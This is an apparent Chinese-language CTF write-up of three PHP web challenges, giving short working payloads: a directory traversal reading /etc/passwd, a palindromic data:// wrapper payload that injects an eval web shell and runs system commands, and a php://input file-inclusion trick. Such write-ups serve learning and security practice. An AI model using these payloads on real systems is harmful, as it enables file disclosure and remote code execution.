0%

web综合wp

记录一下近期写过的web题

Sourceless Guessy

c1b1f1fc2b3449ec4e9cc7b67d473343.png

是目录遍历漏洞,直接payload

1
../../../etc/passwd

7f63d01c555805a38c58c8e3067a8cec.png

查看源码,得到flag

单身杯web签到

f21bcdaac605a0a94b2c9e7e1236899f.png

先简单的了解一下涉及的函数

d122973da3abc00306a901c7f4038ff8.png

17eec29db1eb6163ffc9dcbd780efb82.png

所以本体的意思就是需要post一个不是空字符且把所有的字符顺序颠倒之后还与原字符顺序一样的字符串,所以直接使用data协议

1
file=data://text/plain,<?php eval($_POST[a]);?>>?;)]a[TSOP_$(lave php?<,nialp/txet//:atad

imagebaab96323e9f220d.png

发现已经执行成功

接着查找一下根目录之后就能直接抓flag了

imagefdd0840d7b9b3796.png

payload

1
file=data://text/plain,<?php eval($_POST[a]);?>>?;)]a[TSOP_$(lave php?<,nialp/txet//:atad&a=system ('cat /f1agaaa');

easyphp

image7f823a2855c38b5b.png

先审计一下代码,百度一下里面的函数

image5ae65455e3a00ee1.png

发现传入的file需要有php://input,而且trim过滤了可以存在的数组绕过preg_match,所以利用php://input可以接收POST数据流并解析,就可以得到flag

imagecd1bc5b48324d41b.png

imageb42b7fa2921ffdd3.png

imagef23c47c6ba95cfc9.png